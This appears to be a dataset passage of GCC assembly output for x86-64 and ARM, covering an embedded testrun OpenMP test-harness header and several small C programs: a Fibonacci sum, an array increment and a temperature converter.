#endif\012 } else {\012 " .ascii " fprintf(stdout, \" %20jd %p \\n\", i" .ascii ", pointer);\012 }\012\012 }\012" .ascii "\012 return true;\012}\012\012/*------------" .ascii "---------------------------------------------------" .ascii "-------------*/\012\012/**\012 Run a bunch o" .ascii "f tests in parallel. This will run all configured\012" .ascii " tests independently and return the result o" .ascii "f the test batch,\012 once all tests are don" .ascii "e.\012\012 A clock of the batch runtime " .ascii "will be logged in addition to the\012 result" .ascii " of the testrun.\012\012 @param function " .ascii " pointer to function pointer array\012 @" .ascii "param items amount of items in functions" .ascii "\012 @returns negative count " .ascii "of failed tests\012 " .ascii "positive count of run tests otherwise\012 */\012sta" .ascii "tic inline int64_t testrun_parallel(\012 int" .ascii " (*functions[])(),\012 size_t items) {\012\012" .ascii " if (!functions || items < 1)\012 " .ascii " return 0;\012\012 if (items > INT64_MAX" .ascii " )\012 return 0;\012\012 int6" .ascii "4_t c_OK = 0;\012 int64_t c_NOK = 0;\012\012" .ascii " clock_t start, end;\012 start = cloc" .ascii "k();\012\012 int nthreads = 0, tid = 0;\012\012" .ascii "\012 /*\012 * Use this if you w" .ascii "ant to reduce or set the number of threads\012 " .ascii " *\012 * omp_set_dynamic(0);\012 " .ascii " * omp_set_num_threads(1);\012 */" .ascii "\012\012 #pragma omp parallel for\012 " .ascii " for (size_t i = 0; i < items; i++){\012\012 " .ascii " if (nthreads == 0){\012 " .ascii " tid = omp_get_thread_num();\012 " .ascii " if (tid == 0)\012 " .ascii " nthreads = omp_get_num_threads();\012 " .ascii " }\012\012 if (functions[i] " .ascii "!= 0) {\012\012 if (function" .ascii "s[i]() < 0){\012 #pr" .ascii "agma omp atomic\012 " .ascii "c_NOK++;\012 } else {\012 " .ascii " #pragma omp atomic\012" .ascii " c_OK++;\012 " .ascii " }\012 }\012 }" .ascii "\012\012 testrun_log(\"---------------------" .ascii "------------------------------------\");\012 " .ascii " testrun_log(\"NOTE PARALLEL TESTING\");\012 " .ascii " testrun_log(\"\");\012 testrun_log(\"This v" .ascii "ersion is using OpenMP. Using GCC for compilation \"" .ascii ");\012 testrun_log(\"may produce false valgr" .ascii "ind output due to use of libomp.\");\012 tes" .ascii "trun_log(\"More information is included in docs/val" .ascii "grind/openMP.\");\012 testrun_log(\"--------" .ascii "-----------------------------------------------" .ascii "--\");\012\012\012 testrun_log(\"Parallel RU" .ascii "N (%jd) TESTS in %d threads: \"\012 " .ascii "\"success %jd error %jd)\",\012 c_OK" .ascii " + c_NOK, nthreads,\012 c_OK, c_NOK)" .ascii ";\012\012 end = clock();\012 testrun_" .ascii "log_clock(start, end);\012 testrun_log(\"\")" .ascii ";\012\012 if (c_NOK > 0)\012 " .ascii "return -c_NOK;\012\012 return c_OK;\012}\012" .ascii "\012/*---------------------------------------------" .ascii "-------------------------------*/\012\012/**\012 " .ascii " Run a bunch of tests serial. This will run all" .ascii " configured\012 tests independently and retu" .ascii "rn the result of the test batch,\012 once al" .ascii "l tests are done or the first tests fails, if break" .ascii "_on_error\012 is set.\012\012 A clock" .ascii " of the batch runtime will be logged in addition to" .ascii " the\012 result of the testrun.\012\012 " .ascii " @param function pointer to function poin" .ascii "ter array\012 @param items amount" .ascii " of items in function\012 @param break_on_er" .ascii "ror (true) fail test batch on first error\012 " .ascii " (false) run all tests b" .ascii "efore error return\012 @returns " .ascii " negative count of failed tests\012 " .ascii " positive count of run tests other" .ascii "wise\012 */\012static inline int64_t testrun_sequen" .ascii "tial(\012 int (*functions[])(),\012 s" .ascii "ize_t items,\012 bool break_on_error) {\012\012" .ascii " if (!functions || items < 1)\012 " .ascii " return 0;\012\012 if (items > INT64_MAX" .ascii " )\012 return 0;\012\012 int6" .ascii "4_t c_OK = 0;\012 int64_t c_NOK = 0;\012\012" .ascii " clock_t start, end;\012 start = cloc" .ascii "k();\012\012 for (size_t i = 0; i < items; i" .ascii "++){\012\012 if (functions[i] != 0) " .ascii "{\012\012 if (functions[i]()" .ascii " < 0) {\012\012 c_NO" .ascii "K++;\012 if (break_o" .ascii "n_error)\012 " .ascii " break;\012\012 } else {\012" .ascii "\012 c_OK++;\012\012" .ascii " }\012 }\012 " .ascii " }\012\012 testrun_log(\"Serial RUN (%" .ascii "jd) TESTS: success %jd e" .ascii "rror %jd)\",\012 c_OK + c_NOK,\012 " .ascii " c_OK, c_NOK);\012\012 end = cl" .ascii "ock();\012 testrun_log_clock(start, end);\012" .ascii " testrun_log(\"\");\012\012 if (c_NOK" .ascii " > 0)\012 return -c_NOK;\012\012 " .ascii " return c_OK;\012}\012\012/*--------------------" .ascii "---------------------------------------------------" .ascii "-----*/\012\012/**\012 Run a bunch of config" .ascii "urable parallel and sequential tests serial.\012\012" .ascii " @param max_parallel maximum test cases " .ascii "parallel\012 @param max_sequential maximum" .ascii " test cases sequential\012 @param break_on_e" .ascii "rror (true) fail sequential test batch on first e" .ascii "rror\012 (false) run" .ascii " all sequential tests\012 @returns " .ascii " negative count of run tests cased on error\012" .ascii " positive count of r" .ascii "un tests\012 */\012static inline int64_t testrun_ru" .ascii "n_tests(\012 size_t max_parallel,\012 " .ascii " size_t max_sequential,\012 bool break_on_er" .ascii "ror) {\012\012 int64_t result_parallel = 0" .ascii ";\012 int64_t result_sequential = 0;\012 " .ascii " size_t counter_parallel = 0;\012 size_" .ascii "t counter_sequential = 0;\012\012 if ( (max_" .ascii "parallel == 0) && (max_sequential == 0))\012 " .ascii " return -1;\012\012 // LOAD & RUN te" .ascii "st cases\012\012 if (max_parallel > 0) {\012" .ascii "\012 int (*testcases[max_parallel])(" .ascii ");\012 testrun_init_testcases(testca" .ascii "ses, 0, max_parallel);\012\012 if (!" .ascii "testrun_configure_parallel(\012 " .ascii " testcases, &counter_parallel, &max_parallel)){\012" .ascii " testrun_log_failure(\"Failu" .ascii "re configure parallel.\");\012 " .ascii " return -1;\012 }\012\012 " .ascii " result_parallel = testrun_parallel(testcases" .ascii ", counter_parallel);\012\012 if (res" .ascii "ult_parallel < 0)\012 testru" .ascii "n_log(\"Failure testrun parallel run\");\012\012 " .ascii " }\012\012 if (max_sequential > 0) {\012" .ascii "\012 int (*testcases[max_sequential]" .ascii ")();\012 testrun_init_testcases(test" .ascii "cases, 0, max_sequential);\012\012 i" .ascii "f (!testrun_configure_sequential(\012 " .ascii " testcases, &counter_sequential, &max_sequ" .ascii "ential)){\012 testrun_log_fa" .ascii "ilure(\"Failure configure sequential.\");\012 " .ascii " return -1;\012 }\012" .ascii "\012 result_sequential = testrun_seq" .ascii "uential(\012 testcases, coun" .ascii "ter_sequential, break_on_error);\012\012 " .ascii " if (result_sequential < 0)\012 " .ascii " testrun_log(\"Failure testrun sequential ru" .ascii "n\");\012\012 }\012\012 if ( (result_" .ascii "parallel < 0) || (result_sequential < 0)) {\012 " .ascii " if ( (counter_parallel + counter_sequen" .ascii "tial) == 0)\012 return -1;\012" .ascii " return ( -1 * (counter_parallel + c" .ascii "ounter_sequential));\012 }\012\012 re" .ascii "turn (counter_parallel + counter_sequential);\012}\012" .ascii "\012/** ---------------------------------------" .ascii "--------------------------------\012\012 @ex" .ascii "ample testrun_assert_example.c\012 @a" .ascii "uthor Markus Toepfer\012 @date " .ascii " 2017-10-31\012\012 @brief Exam" .ascii "ple test file using testrun.h\012\012 This e" .ascii "xample shows assert() style based testing with test" .ascii "run.h and is\012 build around the testrun_te" .ascii "st() macro, which increases a counter which\012 " .ascii " MUST be initialized in a testcluster function.\012" .ascii "\012 ---------------------------------------" .ascii "--------------------------------\012\012 @co" .ascii "de\012 #include \"../tools/testrun_parallel." .ascii "h\"\012\012 bool example_function() {\012 " .ascii " return true;\012 }\012 -" .ascii "---------------------------------------------------" .ascii "-------------------\012\012 int test_with_as" .ascii "sert_function() {\012\012 // Fai" .ascii "l on first testing\012 //\012 " .ascii " // Fail on first can be implemented us" .ascii "ing assert,\012 // or by returni" .ascii "ng a negative result of the testrun_test\012 " .ascii " // The following examples do all the s" .ascii "ame, the will stop\012 // the wh" .ascii "ole testrun and report a failure.\012\012 " .ascii " testrun_as" .ascii "sert(\012 example_function()" .ascii " == true, \\\012 \"Failure: " .ascii "NOK result is true.\"\012 );\012\012" .ascii " assert(true == example_function());" .ascii "\012 assert(example_function());\012" .ascii "\012 if (!example_function())\012 " .ascii " return -1;\012\012 " .ascii " // will not be reached in case of error\012 " .ascii " return testrun_log_success();\012 " .ascii " }\012\012 --------------------------------" .ascii "---------------------------------------\012\012 " .ascii " int test_whatever_OK() {\012\012 " .ascii " bool failure = false;\012\012 // Po" .ascii "sitive result logging\012\012 if (!f" .ascii "ailure)\012 return testrun_l" .ascii "og_success();\012\012 // will be rea" .ascii "ched in case of error\012 return tes" .ascii "trun_log_error();\012 }\012\012 -----" .ascii "---------------------------------------------------" .ascii "---------------\012\012 int test_whatever_NO" .ascii "K() {\012\012 // Failure logging (Do" .ascii "n't fail the testrun, just log a failure)\012\012 " .ascii " if (failure)\012 " .ascii " return testrun_log_error();\012\012 " .ascii " // will not be reached in case of error\012 " .ascii " return testrun_log_success();\012\012 " .ascii " }\012\012 -----------------------------" .ascii "------------------------------------------\012\012 " .ascii " int assert_based_testing() {\012\012 " .ascii " testrun_init();\012\012 test" .ascii "run_test(test_with_assert_function);\012 " .ascii " testrun_test(test_whatever_OK);\012 " .ascii " testrun_test(test_whatever_NOK);\012\012 " .ascii " return testrun_counter;\012\012 }\012" .ascii "\012 testrun_run(assert_based_testing);\012 " .ascii " @endcode\012\012**/\012/** -------------" .ascii "---------------------------------------------------" .ascii "-------\012\012 @example testrun_exam" .ascii "ple.c\012 @author Markus Toepfer\012" .ascii " @date 2017-11-22\012\012 @" .ascii "brief Example test file using testrun.h\012" .ascii "\012 This example shows parallel and sequent" .ascii "ial style based testing\012 with testrun.h a" .ascii "nd is build around " .ascii "a MACRO set to execute tests in\012 parallel" .ascii " or seqentuial run.\012\012 //--------------" .ascii "---------------------------------------------------" .ascii "----\012\012 @code\012 #include \"../" .ascii "tools/testrun_parallel.h\"\012\012 bool exam" .ascii "ple_function() {\012 return true;\012" .ascii " }\012\012 //------------------------" .ascii "---------------------------------------------\012\012" .ascii " int testcase_block1(){\012\012 " .ascii " testrun(example_function());\012 " .ascii "testrun(true);\012 testrun(example_f" .ascii "unction(), \"second run of function.\");\012\012 " .ascii " return testrun_log_success();\012 " .ascii " }\012\012 //-----------------------------" .ascii "----------------------------------------\012\012 " .ascii " int testcase_block2(){\012\012 " .ascii "return testrun_log_success();\012 }\012\012 " .ascii " //------------------------------------------" .ascii "---------------------------\012\012 int test" .ascii "case_block3(){\012\012 return testru" .ascii "n_log_success();\012 }\012\012 //----" .ascii "---------------------------------------------------" .ascii "--------------\012\012 Int testcase_block4()" .ascii "{\012\012 return testrun_log_success(" .ascii ");\012 }\012\012 //------------------" .ascii "---------------------------------------------------" .ascii "\012\012 int64_t cluster_tests1(int(*tests[]" .ascii ")(), size_t slot, size_t max) {\012\012 " .ascii " testrun_init(); // create local" .ascii " variables\012 testrun_add(testcase_" .ascii "block1); // adds block1 to tests[]\012 " .ascii " testrun_add(testcase_block2); // adds block2" .ascii " to tests[]\012\012 return testrun_c" .ascii "ounter;\012 }\012\012 //-------------" .ascii "---------------------------------------------------" .ascii "-----\012\012 int64_t cluster_tests2(int(*te" .ascii "sts[])(), size_t slot, size_t max) {\012\012 " .ascii " testrun_init(); // create " .ascii "local variables\012 testrun_add(test" .ascii "case_block3); // adds block3 to tests[]\012 " .ascii " testrun_add(testcase_block4); // adds b" .ascii "lock4 to tests[]\012\012 return test" .ascii "run_counter;\012 }\012\012 //--------" .ascii "------" .ascii "---------------------------------------------------" .ascii "----\012\012 bool testrun_configure_parallel" .ascii "(\012 int (*testcases[])(),\012 " .ascii " size_t * const start,\012 " .ascii " size_t const * const max){\012\012 " .ascii "if (!testcases || !start || !max)\012 " .ascii " return false;\012\012 if(t" .ascii "estrun_add_testcases(\012 te" .ascii "stcases,start, max, cluster_tests1) < 0)\012 " .ascii " return false;\012\012 " .ascii " return true;\012 }\012\012 //-----" .ascii "---------------------------------------------------" .ascii "-------------\012\012\012 bool testrun_confi" .ascii "gure_sequential(\012 int (*testcases" .ascii "[])(),\012 size_t *const start,\012 " .ascii " size_t const * const max){\012\012 " .ascii " if (!testcases || !start || !max)\012" .ascii " return false;\012\012 " .ascii " if(testrun_add_testcases(\012 " .ascii " testcases,start, max, cluster_tests1) <" .ascii " 0)\012 return false;\012\012" .ascii " if(testrun_add_testcases(\012 " .ascii " testcases,start, max, cluster_tes" .ascii "ts2) < 0)\012 return false;\012" .ascii "\012 return true;\012\012 }\012" .ascii "\012 //-------------------------------------" .ascii "--------------------------------\012\012 int" .ascii "64_t run_tests() {\012\012 return te" .ascii "strun_run_tests(1000,1000,false);\012 }\012\012" .ascii " testrun_run(run_tests);\012 @endcode" .ascii "\012\012**/\012\012#endif /* testrun_openmp_h */\012" .ascii "\000" .data .align 2 .type helper_testrun_header_openmp, %object .size helper_testrun_header_openmp, 4 helper_testrun_header_openmp: .word .LC0 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "671445.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Enter n : " .LC1: .string "%d" .LC2: .string "%d %d " .LC3: .string "%d " .LC4: .string "\nSum : %d" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov DWORD PTR -36[rbp], edi mov QWORD PTR -48[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -12[rbp], 1 mov DWORD PTR -24[rbp], 2 mov DWORD PTR -20[rbp], 0 mov DWORD PTR -16[rbp], 0 lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -28[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov edx, DWORD PTR -24[rbp] mov eax, DWORD PTR -12[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -24[rbp] add eax, edx mov DWORD PTR -20[rbp], eax jmp .L2 .L3: mov eax, DWORD PTR -20[rbp] mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR -24[rbp] mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -20[rbp] mov DWORD PTR -24[rbp], eax mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -24[rbp] add eax, edx mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -12[rbp] and eax, 1 test eax, eax jne .L2 mov eax, DWORD PTR -12[rbp] add DWORD PTR -16[rbp], eax .L2: mov eax, DWORD PTR -28[rbp] cmp DWORD PTR -20[rbp], eax jle .L3 mov eax, DWORD PTR -16[rbp] mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L5 call __stack_chk_fail@PLT .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "671445.c" .text .section .rodata .align 2 .LC0: .ascii "Enter n : \000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "%d %d \000" .align 2 .LC3: .ascii "%d \000" .align 2 .LC4: .ascii "\012Sum : %d\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-32] str r1, [fp, #-36] ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #1 str r3, [fp, #-12] mov r3, #2 str r3, [fp, #-24] mov r3, #0 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-16] ldr r0, .L6+4 bl printf sub r3, fp, #28 mov r1, r3 ldr r0, .L6+8 bl __isoc99_scanf ldr r2, [fp, #-24] ldr r1, [fp, #-12] ldr r0, .L6+12 bl printf ldr r2, [fp, #-12] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-20] b .L2 .L3: ldr r1, [fp, #-20] ldr r0, .L6+16 bl printf ldr r3, [fp, #-24] str r3, [fp, #-12] ldr r3, [fp, #-20] str r3, [fp, #-24] ldr r2, [fp, #-12] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-12] and r3, r3, #1 cmp r3, #0 bne .L2 ldr r2, [fp, #-16] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-16] .L2: ldr r3, [fp, #-28] ldr r2, [fp, #-20] cmp r2, r3 ble .L3 ldr r1, [fp, #-16] ldr r0, .L6+20 bl printf mov r3, #0 ldr r2, .L6 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L5 bl __stack_chk_fail .L5: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L7: .align 2 .L6: .word .LC5 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "827106.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "827106.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "133252.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Enter size of array: " .LC1: .string "%d" .LC2: .string "%d. Enter a number: " .LC3: .string "\n\nORIGINAL ARRAY:" .LC4: .string "%d " .LC5: .string "\n\nINCREMENTED ARRAY:" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r15 push r14 push r13 push r12 push rbx sub rsp, 40 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 mov rax, QWORD PTR fs:40 mov QWORD PTR -56[rbp], rax xor eax, eax mov rax, rsp mov rbx, rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -80[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -80[rbp] movsx rdx, eax sub rdx, 1 mov QWORD PTR -72[rbp], rdx movsx rdx, eax mov r14, rdx mov r15d, 0 movsx rdx, eax mov r12, rdx mov r13d, 0 cdqe lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov ecx, 16 mov edx, 0 div rcx imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L2: cmp rsp, rdx je .L3 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L2 .L3: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L4 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L4: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -64[rbp], rax mov DWORD PTR -76[rbp], 0 jmp .L5 .L6: mov eax, DWORD PTR -76[rbp] add eax, 1 mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR -76[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -64[rbp] add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -76[rbp], 1 .L5: mov eax, DWORD PTR -80[rbp] cmp DWORD PTR -76[rbp], eax jl .L6 lea rdi, .LC3[rip] call puts@PLT mov DWORD PTR -76[rbp], 0 jmp .L7 .L8: mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -76[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT add DWORD PTR -76[rbp], 1 .L7: mov eax, DWORD PTR -80[rbp] cmp DWORD PTR -76[rbp], eax jl .L8 mov edx, DWORD PTR -80[rbp] mov rax, QWORD PTR -64[rbp] mov esi, edx mov rdi, rax call increment lea rdi, .LC5[rip] call puts@PLT mov DWORD PTR -76[rbp], 0 jmp .L9 .L10: mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -76[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT add DWORD PTR -76[rbp], 1 .L9: mov eax, DWORD PTR -80[rbp] cmp DWORD PTR -76[rbp], eax jl .L10 mov eax, 0 mov rsp, rbx mov rbx, QWORD PTR -56[rbp] sub rbx, QWORD PTR fs:40 je .L12 call __stack_chk_fail@PLT .L12: lea rsp, -40[rbp] pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .globl increment .type increment, @function increment: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -4[rbp], 0 jmp .L14 .L15: mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov edx, DWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx add edx, 2 mov DWORD PTR [rax], edx add DWORD PTR -4[rbp], 1 .L14: mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -28[rbp] jl .L15 nop nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size increment, .-increment .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "133252.c" .text .section .rodata .align 2 .LC0: .ascii "Enter size of array: \000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "%d. Enter a number: \000" .align 2 .LC3: .ascii "\012\012ORIGINAL ARRAY:\000" .align 2 .LC4: .ascii "%d \000" .align 2 .LC5: .ascii "\012\012INCREMENTED ARRAY:\000" .align 2 .LC6: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #28 ldr r3, .L10 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, sp mov r4, r3 ldr r0, .L10+4 bl printf sub r3, fp, #32 mov r1, r3 ldr r0, .L10+8 bl __isoc99_scanf ldr ip, [fp, #-32] sub r3, ip, #1 str r3, [fp, #-24] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-28] b .L2 .L3: ldr r3, [fp, #-28] add r3, r3, #1 mov r1, r3 ldr r0, .L10+12 bl printf ldr r3, [fp, #-28] lsl r3, r3, #2 ldr r2, [fp, #-20] add r3, r2, r3 mov r1, r3 ldr r0, .L10+8 bl __isoc99_scanf ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L2: ldr r3, [fp, #-32] ldr r2, [fp, #-28] cmp r2, r3 blt .L3 ldr r0, .L10+16 bl puts mov r3, #0 str r3, [fp, #-28] b .L4 .L5: ldr r3, [fp, #-20] ldr r2, [fp, #-28] ldr r3, [r3, r2, lsl #2] mov r1, r3 ldr r0, .L10+20 bl printf ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L4: ldr r3, [fp, #-32] ldr r2, [fp, #-28] cmp r2, r3 blt .L5 ldr r3, [fp, #-32] mov r1, r3 ldr r0, [fp, #-20] bl increment ldr r0, .L10+24 bl puts mov r3, #0 str r3, [fp, #-28] b .L6 .L7: ldr r3, [fp, #-20] ldr r2, [fp, #-28] ldr r3, [r3, r2, lsl #2] mov r1, r3 ldr r0, .L10+20 bl printf ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L6: ldr r3, [fp, #-32] ldr r2, [fp, #-28] cmp r2, r3 blt .L7 mov r3, #0 mov sp, r4 ldr r2, .L10 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L9 bl __stack_chk_fail .L9: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L11: .align 2 .L10: .word .LC6 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word .LC5 .size main, .-main .align 2 .global increment .syntax unified .arm .fpu softvfp .type increment, %function increment: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-8] b .L13 .L14: ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-16] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 add r2, r2, #2 str r2, [r3] ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L13: ldr r2, [fp, #-8] ldr r3, [fp, #-20] cmp r2, r3 blt .L14 nop nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size increment, .-increment .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "445289.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Digite a temperatura em C: " .LC1: .string "%f" .align 8 .LC4: .string "Temperatura em C: %.2f\nTemperatura em F: %.2f" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT movss xmm0, DWORD PTR -16[rbp] pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC2[rip] mulsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC3[rip] addsd xmm0, xmm1 cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 pxor xmm0, xmm0 cvtss2sd xmm0, DWORD PTR -12[rbp] movss xmm1, DWORD PTR -16[rbp] pxor xmm2, xmm2 cvtss2sd xmm2, xmm1 movq rax, xmm2 movapd xmm1, xmm0 movq xmm0, rax lea rdi, .LC4[rip] mov eax, 2 call printf@PLT nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .section .rodata .align 8 .LC2: .long -858993459 .long 1073532108 .align 8 .LC3: .long 0 .long 1077936128 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 